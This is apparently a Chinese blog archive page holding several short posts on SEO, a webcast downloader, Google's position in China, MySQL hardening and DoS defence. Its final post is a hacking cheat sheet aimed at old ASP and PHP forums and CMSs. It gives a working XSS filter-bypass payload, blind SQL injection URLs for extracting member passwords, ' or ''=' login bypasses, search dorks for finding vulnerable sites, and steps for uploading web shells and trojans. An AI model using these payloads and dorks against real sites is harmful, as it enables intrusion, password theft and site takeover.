分类 : 业界动态 | 发表时间 01-12-2007
关键词: 技巧 , 资料
这也是提高博客访问量的方法,相当有效!
提交博客到博客搜索引擎
提交到博客到博客推广和聚合平台
提交博客到网站搜索引擎
分类 : 业界动态 | 发表时间 01-12-2007
关键词: seo , 优化 , 资料
昨天还在说,seo的理论过于简单化,前一段日子,也在感叹不能找到比较系统的seo教程,今天,就正好碰到了seo界的比较经典的几本教程书,有兴趣的,可以一并下载参考下。
我也是一个SEO 搜索引擎优化 新手,这里提供几本SEO新手必读的教程 :1.胡宝介《搜索引擎优化SEO知识完全手册》;2.王通《搜索引擎排名秘籍》2007版;3.刘志军《搜索引擎优化SEO从入门到精通》;4.KEE《搜索引擎优化实操手册》;
点下面的链接下载seo教程 ,都为pd格式:
1.胡宝介《搜索引擎优化SEO知识完全手册》 备用下载
2.王通《搜索引擎排名秘籍》2007版 备用下载
3.刘志军《搜索引擎优化SEO从入门到精通》 备用下载
4.KEE《搜索引擎优化实操手册》 备用下载
如此经典实用的教程,错过了,没有好好研读的话,可就不能怪没给自己机会了。
分类 : 技术文摘 | 发表时间 28-09-2007
关键词: hp , ie , mysql , php , pr , server , sql , sql server , 安全 , 安装 , 密码 , 数据库 , 服务 , 服务器 , 网站 , 自动 , 资料 , 问题
在安装完MySQL后,它会自动创建一个root用户和一个匿名用户,其初始密码都是空,对于前者,很多参考资料上都会提醒大家要注意及时设定一个密码,而忽略了后者,大概是因为后者默认设定为只能在本机使用的缘故吧。
但如果你的MySQL是要提供给Web服务器作数据库服务的,忽略这个匿名用户的代价可能相当惨重,因为在默认设置下,这个匿名用户在localhost上几乎拥有和root一样的权限,这时候,如果你的客户拥有上传脚本文件、脚本文件可以进行MySQL数据库操作(比如允许操作MySQL的php)的权限已经可能将你的MySQL改动得面目全非了:
我今天帮朋友整理他的主页空间的时候,试着写了一个很简单的执行sql语句的php文件上传上去,其中连接字中的user,password我都试着置空,host=localhost,结果发现我的sql语句可以执行,于是执行select * from MySQL.user察看用户权限,发现这个用户在localhost权限非常高,连grant_priv都有,(察看的时候,会发现在root用户下有两行用户名、密码为空的,但各项权限有y\n的,就是这个匿名用户本地、远程权限设置了)
所以我试着用这个php页面创建一个新用户,并grant给他较高的权限,结果一举成功,这样我就可以用这个新用户通过我本机的MySQL client连接到这个网站的MySQL server,并用这个新建立的用户的管理权限对这个网站的MySQL server进行管理,看到自己可以进行这样轻易获得深入的数据库操作,我怎么还敢把朋友的主页空间的敏感资料放入这个MySQL server呢?
改进建议:
1、在安装完成MySQL 后,不仅改变root用户的的密码,也同时改变匿名用户的密码,方法类似改变root的密码的方式:
MySQL> UPDATE user set password=PASSWORD(‘yournewpassword’) where user=”; MySQL>FLUSH PRIVILEGES;
2、如非必要,删除这个匿名用户,这样所有人要使用MySQL 都必须提供用户名,即便日后出了问题,也容易查找问题的源头。
3、除了root用户外,其他用户包括匿名用户(如果没有删除这个用户)不应该拥有grant权限,防止管理权限不受控制的扩散出去。
4、赋予用户update\delete\alert\create\drop权限的时候,应该限定到特定的数据库,尤其要避免普通客户拥有对MySQL数据库做操作的权限,否则你的系统设置很可能被替换掉。
5、检查MySQL.user表,取消不必要用户的shutdown_priv,reload_priv,process_priv和File_priv权限,这些权限可能泄漏更多的服务器信息包括非MySQL的其它信息出去。
6、如果不打算让你的用户使用MySQL数据库,在提供诸如php这样的脚本语言的时候,重新设置或编译你的php,取消它们对MySQL的默认支持。
分类 : 技术文摘 | 发表时间 09-02-2007
关键词: 浏览器 , 网站 , 资料
信息来源:cnBeta.COM
中文MSDN Webcast从2004年诞生至今已经开播了500多门课程,这些课程都是非常优秀的技术资料,很多爱好者都会选择将他们下载到自己的计算机上慢慢观看 并做为长久收藏.然而如此众多的课程,1000多个文件,一个一个的下载、解压实在是一件可怕的工作,而这么多文件下载到硬盘上如何进行管理,如何将课程 和文件一一对应起来,也是一件令人头疼的工作.
正是由于这些原因,iReaper诞生了. 他的设计理念非常简单,从一个统一的视角: 中文MSDN Webcast课程,为我们提供一个一站式的下载->解压->播放管理功能 使得这些网络视频资料能够更加充分的造福每一个开发者.
iReaper是什么? iReaper是由国内的.Net爱好者开发的桌面小工具,用来帮助您下载中文MSDN Webcast。
中文MSDN Webcast是什么? 中文MSDN Webcast是由微软中国主办的一系列网络在线课程。任何人只要能自由使用互联网,就能完全免费的收听收看实时的网络视频直播,或者下载往期的网络课程录像。
为什么要使用iReaper? 中 文MSDN Webcast从2004年诞生至今已经开播了500多门课程,这些课程都是非常优秀的技术资料,很多爱好者都会选择将他们下载到自己的计算机上慢慢观看 并做为长久收藏。然而如此众多的课程,1000多个文件,一个一个的下载、解压实在是一件可怕的工作,而这么多文件下载到硬盘上如何进行管理,如何将课程 和文件一一对应起来,也是一件令人头疼的工作。 正是由于这些原因,iReaper诞生了。他的设计理念非常简单,从一个统一的视角:中文MSDN Webcast课程,为我们提供一个一站式的下载->解压->播放管理功能,使得这些网络视频资料能够更加充分的造福每一个开发者。
为什么iReaper看起来这么粗糙? iReaper是由一些刚刚走出校园的.Net技术爱好者开发的,第一个版本Release至今不过2个月的时间。我们的最初的目标是开发一个可用的、可靠的下载和管理工具,因此在用户界面上没有投入什么精力,一切以简单实用为目标。因此目前看起来比较丑陋。
从哪里可以获得iReaper? 您可以通过网站:www.ireaper.net访问iReaper的首页。目前我们把家安放在博客园,您可以通过首页左侧的连接下载iReaper。感谢dudu为大家提供这么好的地方交流。
下载: iReaper 访问: iReaper
分类 : 业界动态 | 发表时间 19-09-2006
关键词: blog , google , 冲突 , 分析 , 博客 , 安全 , 广告 , 技术 , 搜索 , 显示 , 服务 , 服务器 , 百度 , 网站 , 网络 , 联想 , 营销 , 谷歌 , 资料 , 采集 , 问题
昨天,中国互联网中心(CNNIC)和著名网络分析师吕伯望同时发布了关于中国互联网搜索引擎的市场报告, 上演了一出互联网版本的“ 福布斯胡润富豪榜” 之争。
尽管数据不完全相同,但两份报告得出的结论却惊人地一致—— 谷歌在一年之中迅速流失用户,百度正收割这些流失的核心客户。而吕版的报告更是显示谷歌大跌13 个百分点。
CNNIC 报告数据显示,百度和谷歌在中国搜索市场占有率分别为62.1% 、25.3% ,2005 年两个公司的数据分别是52% 和33% 。而吕伯望版报告显示,百度和谷歌的市场占有率分别为64.5% 和20.6% ,今年谷歌已丧失了20% 的核心用户,其中80% 流向了百度。
种种数据表明,谷歌在中国水土不服,与其在全球的地位很不相称,究其原因,主要在以下几个方面:
第一:搜索的满意度。 谷歌对中文的理解程度显然不如中国本土的搜索引擎。在谷歌中进行中文搜索时,结果往往把用户的检索词串拆得太碎,以至于搜索结果往往不尽人意。随着谷歌的神圣光环逐渐褪去,人们更容易发现,谷歌的中文搜索的用户体验,确实与百度之间还有一个很大的落差。 9 月13 日下午 ,谷歌公司就这两份搜索引擎报告对外发表官方态度时也认识到了这个问题。 谷歌认为中文搜索技术正处在巨大的变革时期,另一方面在对搜索的满意度上,中文用户与英文用户相比还有较大的差距,无论是技术水平还是用户体验,谷歌都认为自己需要走的路还很长。
第二:服务器稳定性。 在Google.com 里面进行搜索的时候,经常会遇到突然出现“该页无法显示” 的提示,并且之后的十多分钟都无法正常连接谷歌。
第三:渠道问题。 谷歌在渠道方面,主要是通过兼并收购等来扩大渠道,但其运作方式似乎还不能适应中国广告营销。到目前,谷歌在国内的代理商只有数家。而其在广告营销方面的负面报道却并不少见,它对谷歌的光环的影响力已非常明显。虽然渠道建设跟谷歌的理念是冲突的。谷歌特别不喜欢别人败坏它的声誉,它不但把“不为恶” 当作自己的信仰,还事必躬亲,取消一切中间环节,直接面对客户和用户。 但渠道又确实是一种国情,就连所向披靡的戴尔,在中国也一直无法动摇土生土长的联想。
第四:不合适的反作弊手法。 谷歌一年来大大加强了反作弊的力度,但由于不甚了解中国国情,谷歌一下封闭了上千家网站,其强硬的操作手法,引起中国网站站长们的强力反抗。这点上百度也有类似的阵痛。
第五:触及个人隐私。 每天有2 亿用户使用谷歌搜索服务,其中大部分在美国本土以外,谷歌的隐私资料收集行为将成为个人数据的定时炸弹。连华盛顿新成立的安全局资料采集部门都梦想获得谷歌搜集资料的高效能力。事实上,谷歌也正在试图诱惑每一个人在互联网上完整记录自己的人生,包括交际、商业、生活、情感和思想。谷歌“ 搜人” 并“ 记录人的生活” ,把物理社会的个体、组织和交往行为映射到互联网上,通过数字化和虚拟化后据为己有,并最终改造成谷歌的资产。由于大量的个人信息集中在一起,谷歌正在成为互联网上最大的个人隐私隐患。
第六:中文名称“谷歌”的问题。 一些网友甚至自发成立了反对“谷歌”的网站。 他们签署人极力主张明确发言并投票反对Google 使用中文名称“谷歌” ,一致认为“ 谷歌” 一词极大的影响了 Google 在中国的使用者和支持者们心中的形象,并最终可能会影响到Google 在中国的影响力。据悉,这个网站现在已有十几万的签名了。
分类 : 技术文摘 | 发表时间 08-08-2006
关键词: asp , data , discuz , hi , hp , ie , linux , mysql , php , phpwind , sp2 , sql , TM , windows , xp , 下载 , 乱码 , 代码 , 升级 , 图片 , 安全 , 安装 , 密码 , 工具 , 插件 , 数据库 , 数据恢复 , 服务 , 服务器 , 流量 , 测试 , 浏览器 , 登陆 , 程序 , 统计 , 自动 , 论坛 , 资料 , 软件 , 配置 , 错误 , 问题
分类 : 系统安全 | 发表时间 13-06-2006
关键词: linux , 下载 , 优化 , 免费 , 入侵 , 分析 , 升级 , 商务 , 安全 , 安装 , 工具 , 技术 , 搜索 , 攻击 , 新闻 , 服务 , 服务器 , 杂志 , 清除 , 漏洞 , 电子商务 , 程序 , 网络 , 自动 , 资料 , 路由 , 路由器 , 软件 , 配置 , 问题 , 预防
简单地说,掌握所有可能导致被入侵和被用于实施拒绝服务攻击的原因和安全漏洞是非常复杂的。详细地说,没有简单和专门的方法保护不受到这些攻击,而只能尽可能地应用各种安全和保护策略。对于每个面临安全威胁的系统,这里列出了一些简单易行和快速的安全策略以保护免受这些攻击。 对于面临拒绝服务攻击的目标或潜在目标,应该采取的重要措施: 1、消除FUD心态 FUD的意思是Fear(恐惧)、Uncerntainty(猜测)和Doubt(怀疑)。最近发生的攻击可能会使某些人因为害怕成为攻击目标而整天担心受怕。其实必须意识到可能会成为拒绝服务攻击目标的公司或主机只是极少数,而且多数是一些著名站点,如搜索引擎、门户站点、大型电子商务和证券公司、IRC服务器和新闻杂志等。如果不属于这类站点,大可不必过于担心成为拒绝服务攻击的直接目标。 2、要求与ISP协助和合作 获得你的主要互联网服务供应商(ISP)的协助和合作是非常重要的。分布式拒绝服务(DDoS)攻击主要是耗用带宽,单凭你自己管理网络是无法对付这些攻击的。与你的ISP协商,确保他们同意帮助你实施正确的路由访问控制策略以保护带宽和内部网络。最理想的情况是当发生攻击时你的ISP愿意监视或允许你访问他们的路由器。 3、优化路由和网络结构 如果你管理的不仅仅是一台主机,而是网络,就需要调整路由表以将拒绝服务攻击的影响减到最小。为了防止SYN flood攻击,应设置TCP侦听功能。详细资料请参阅相关路由器技术文档。另外禁止网络不需要使用的UDP和ICMP包通过,尤其是不应该允许出站ICMP“不可到达”消息。 4、优化对外开放访问的主机 对所有可能成为目标的主机都进行优化。禁止所有不必要的服务。另外多IP主机也会增加攻击者的难度。建议在多台主机中使用多IP地址技术,而这些主机的首页只会自动转向真正的web服务器。 5、正在受到攻击时,必须立刻应用对应策略。 尽可能迅速地阻止攻击数据包是非常重要的,同时如果发现这些数据包来自某些ISP时应尽快和他们取得联系。千万不要依赖数据包中的源地址,因为它们在DoS攻击中往往都是随机选择的。是否能迅速准确地确定伪造来源将取决于你的响应动作是否迅速,因为路由器中的记录可能会在攻击中止后很快就被清除。 对于已被或可能被入侵和安装DDoS代理端程序的主机,应该采取的重要措施: 6、消除FUN心态 作为可能被入侵的对象,没必要太过紧张,只需尽快采取合理和有效的措施即可。现在的拒绝服务攻击服务器都只被安装到Linux和Solaris系统中。虽然可能会被移植到*BSD*或其它系统中,但只要这些系统足够安全,系统被入侵的可能性不大。 7、确保主机不被入侵和是安全的 现在互联网上有许多旧的和新的漏洞攻击程序。以确保你的服务器版本不受这些漏洞影响。记住,入侵者总是利用已存在的漏洞进入系统和安装攻击程序。系统管理员应该经常检查服务器配置和安全问题,运行最新升级的软件版本,最重要的一点就是只运行必要的服务。如果能够完全按照以上思路,系统就可以被认为是足够安全,而且不会被入侵控制。 8、周期性审核系统 必须意识到你要对自己管理的系统负责。应该充分了解系统和服务器软件是如何工作的,经常检查系统配置和安全策略。另外还要时刻留意安全站点公布的与自发管理的操作系统及软件有关的最新安全漏洞和问题。 9、检查文件完整性 当确定系统未曾被入侵时,应该尽快这所有二进制程序和其它重要的系统文件产生文件签名,并且周期性地与这些文件比较以确保不被非法修改。另外,强烈推荐将文件检验和保存到另一台主机或可移动介质中。这类文件/目录完整性检查的免费工具(如tripwire等)可以在许多FTP站点上下载。当然也可以选择购买商业软件包。 10、发现正在实施攻击时,必须立刻关闭系统并进行调查 如果监测到(或被通知)网络或主机正实施攻击,应该立刻关闭系统,或者至少切断与网络的连接。因为这些攻击同时也意味着入侵者已几乎完全控制了该主机,所以应该进行研究分析和重新安装系统。建议联系安全组织。。必须记往,将攻击者遗留在入侵主机中的所有程序和数据完整地提供给安全组织或专家是非常重要,因为这能帮助追踪攻击的来源。
分类 : 系统安全 | 发表时间 13-06-2006
关键词: asp , baidu , bbs , blog , cookie , css , data , flash , google , hp , ie , md5 , microsoft , php , phpwind , pr , server , sp2 , sql , TM , webshell , xp , 下载 , 主题 , 代码 , 入侵 , 共享 , 关键词 , 分析 , 动网 , 原理 , 友情链接 , 后门 , 安全 , 密码 , 工具 , 广告 , 搜索 , 数据库 , 新闻 , 显示 , 服务 , 服务器 , 木马 , 正式版 , 注册 , 测试 , 漏洞 , 病毒 , 登陆 , 百度 , 破解 , 程序 , 编码 , 网站 , 自动 , 认证 , 论坛 , 资料 , 软件 , 链接 , 错误 , 问题 , 限制 , 黑客
信息来源:慕容小雨’s blog 慕容小雨何许人也,偶不认识,不过听neeao说过多次,再从作品上看,当非凡人也!呵 各种漏洞的利用和一些搜索参数 说到漏洞,首先应该提到的就是动网的上传漏洞了。 “洞网”漏洞拉开了上传漏洞文件的序幕,其他系统的上 传漏洞接踵而来! asp动网论坛漏洞分析 1、这个漏洞不算太严重,用过动网论坛的人都知道,发帖时直接写javascript会被过滤拆分,写http会自动加上链接,漏洞就在此,在这两个地方变通一下,把两个单词的某个字母换成编码形式,然后系统再对应地解码回字母,就达到了避免被过滤的目的。例子说明一下,在发帖时写入[img]javasx63ript:window.open(‘httx70://www.fwcn.com’,”)[/img] 很清楚地看到,#x63解码的字母是”c”,#x70解码的字母是”p”,&起到连接作用,最后加上[img],使JS被触发,如果论坛支持flash插入,用[swf]也可。利用这个漏洞可以搞些恶作剧,写上诱人的主题,点进去结果是他的主页(骗点击率,作广告),甚至更绝,连到一个有病毒、木马的网页上,让你直想骂娘。这个漏洞存在于动网的各个版本,包括较新的0519版,覆盖面积之广让人瞠目,各人认为应该对某些非法字符进行检测剔除,而非简简单单地拆分了事,真希望动网开发者能尽早补上这漏洞。 2、比起前者,第二个漏洞问题就大啦,利用该漏洞可以破解掉论坛上所有注册会员的密码(恐怖~~~),由于论坛管理员通常直接把论坛程序载下来梢加以美工就拿来使用了,图方便直接导致了漏洞的出现,我们也载一个回来,只要看一下动网的数据库,就知道了密码的字段为userpassword,接着例如要破一个名叫abc的用户密码,首先察看abc的用户资料,给出的连接是http://xxxxx/dispuser.asp?name=abc ,在dispuser.asp中,读取参数的语句是:username=trim(request(“name”)),数据库的查询的语句是: sql=”select * from [user] where username=’”&username&”‘”,看得出来, abc就是直接被作为了dispuer的一个参数username,另外,如果该用户不存在,程序就会给出提示,既然如此,我们就再写入个查询密码的条件,在where username=abc后面加上and userpassword=”******”,理论上这样就可以实现对密码的破解了,但这么破要破到何年何月,现在就要轮到VBS函数大显身手了,可以先用len函数试出用户的密码位数,地址就这么写http://xxxxx/dispuser.asp?name=abc'%20and%20len(userpassword)=5%20and%20’1′=’1,这么看可能不好理解,放到sql语句里其实就是这副样子:sql=”select * from [User] where username=’abc’ and len(UserPassword)=5 and ’1′=’1′”,现在明白点了吧,%20是空格,abc后面的单引号和’1′=’1里的单引号都是为了和sql语句相匹配。奇怪,该用户不存在,喔?那就说明符合这个条件的用户没有,继续,把5换成6,7,8,依此类推,只要能显示出用户资料了,就说明密码位数猜对了。接下来要做的就是试每位的密码是多少了,继续要用到VBS,可以用left或right或mid函数,http://xxxxx/dispuser.asp?name=abc'%20and%20left(userpassword,1)=’a,如果猜对了就给出用户资料,猜对了就给出该用户不存在的提示,这样子还是嫌太慢,那就在外面再套个asc函数,http://xxxxx/dispuser.asp?name=abc'%20and%20asc(mid(userpassword,1,1))>’50 试出用户密码的ASCII码是否大于50,不断地缩小范围,相信很快就能将范围缩小至个位数,看到这里你是否惊出了一身冷汗,起码我是如此,*几个函数的灵活运用,保守地说,不出半小时就能破解出密码。真是不幸中的大幸,动网开发者在后来的05**版后使用了MD5的加密,这下子总算放心了,但介于国内还有许多地方在使用老版本的动网论坛(包括一个小有名气的flash站点) 3 、动网SQL语句漏洞 此漏洞针对动网SQL版本。 测试方法:在http://ip/bbs/admin_index.asp 输入用户名是’or”=’ 密码也是这个 这样可以跳过认证 原理:利用SQL语法。输入的密码和ID就成为一个合法的SQL语句,直接跳过认证。 此漏洞并不针对动网。很多SQL的ASP都会有这个漏洞 4、动网论坛sp2漏洞 (此漏洞影响范围甚大,动网官方站、黑客防线、安全基地都曾因此被黑过,具体资料大家可以在百度搜一下) 上传漏洞路径:reg_upload.asp及upfile.asp 青创文章系统 打开google 输入.tw qcdn (或者是去百度搜索 Powered by:QCDN_NEWS 但大多数是中国的) 青创文章系统 上传漏洞。在网址后加/admin_upfile.asp 如果出现。 Microsoft VBScript 磅︽顶琿岿粇 岿粇 ’800a01b6′ ンぃや穿妮┦┪よ猭: ‘form’ /article/admin_upfile.asp, 21 就代表已经有90%以上的希望了 桂林老兵的上传工具上传木马 入侵的時候發現admin_upfile.asp改了。你也可以改成user_upfile.asp也上傳傳馬馬。還有一個方法就是把admin_upfile.asp user_upfile.asp加到注入工裏邊 青创文章管理系统注入功击 关键字”list.asp?unid=” 工具: 1、NBSI好像大部分黑客站点都有得下。 2、MD5Crack2,破解MD5加密的软件(磊子推荐:dos下DV.exe比较好用) 第一次检测的时候,会报告”暂未检测到注入漏洞”;然后在”特征字符”输入”Unid” (提示:”Unid”中的” U “一定要是大写的 “飞龙文章管理系统” 漏洞 飞龙文章管理系统 Ver 2.0 Build 20040620 正式版漏洞利用 搜索”Article.asp?ArtID=”关键字 漏洞文件在 admin_upfile.asp user_upfile.asp 这两个文件”upfile.asp” 动网漏洞的再现 上传时cookie中加”ArtID=1111;” phpwind 1.3.6 的论坛漏洞的利用 搜索关键字”POWER BY PHPWIND v1.3.6″ phpwind1.3.6论坛利用程序 “群共享”中有上传 保存后,木马地址为当前目录下的faq.php 在本机用如下表单进行提交:
METHOD=”POST”>
上传成功后的木马存在论坛目录下 直接访问就行! 漏洞集合 1)Co Net MiB Ver1.0~4.0 用’or’='or’登陆管理员(一个比较经典的漏洞) 2)ASP Calendar漏洞 请在google搜索Maintained with the Ocean12 ASP Calendar Manager v1.01这个信息,程序的默认数据库为o12cal.mdb(非MD5加密,明文保存) 3)六合彩漏洞 我们打开www.baidu.com或是www.google.com 在搜索里输入 请各位验证会员料 http://www.3589.com/tian/4login.asp把4login.asp改成conn.inc <%DBPath=Server.MapPath("wz520#.mdb") Set conn=Server.CreateObject(“ADODB.Connection”) conn.Open “Driver={Microsoft Access Driver (*.mdb)};DBQ=”&DBPath%> wz520#.mdb,他就是数据库了。#改成%23就可以下载数据库了 4)青创文章系统出现严重漏洞 在网址后加/admin_upfile.asp上传WEBSHELL 百度搜索 Powered by:QCDN_NEWS 台湾.tw qcdn。 还可以用%5c暴库,通杀 “list.asp?unid=” ” .tw/list.asp?unid= ” 存在注入 在”特征字符”输入”Unid” (”Unid”中的” U “一定要是大写的) 5)自由动力3.6的软件上传过滤不严 用WinHex.exe和WSockExpert.exe修改上传木马 E时代驿站漏洞 百度搜索”E时代驿站” 漏洞利用页面 /upload.asp 用老
兵直接上传 沸腾新闻系统上传漏洞 搜索:沸腾展望新闻系统[核心:尘缘雅境]授权使用 漏洞:没有对空格进行严格的限制。 所以,我们直接选定要上传的asp木马,然后在后面加上空格 它的上传文件是UploadFaceOK.asp 尘缘雅境 在GOOGLE里搜索关键词: V1.0 ACCESS Finish,就会看 到出现了 一大堆 使用尘缘雅境系统的网站.比如说他的网站首页 是http://www.xx.com/asfq/index.asp,那么就要这样填写 http://www.xx.com/asfq/admin/uploadfaceok.asp,[漏洞目 录]:/asfq/admin (注意一定要加上admin),[漏洞文件]一般不用改,不过有 些老版的 尘缘系统 的漏洞文件是uploadok.asp,如果uploadfaceok.asp不成功 再改 OFSTAR论坛漏洞利用程序(群共享中) 搜索: powered by ofstar.net 1:输入管理员用户名 2:输入任意一个帖子的路径! 3:单击获取密码,可以截取到管理员的MD5密码!是32位加密的! 4:单击直接登陆按钮!程序会自动构造Cookies进行登陆!单击管理栏的”超管”可直接进入后台! 上传木马: 选择后台的论坛管理=>风格摸版设置 插入以下代码! (其实上传shell部分和PHPWind一样) 然后使用提交页面提交“可以直接拿到shell!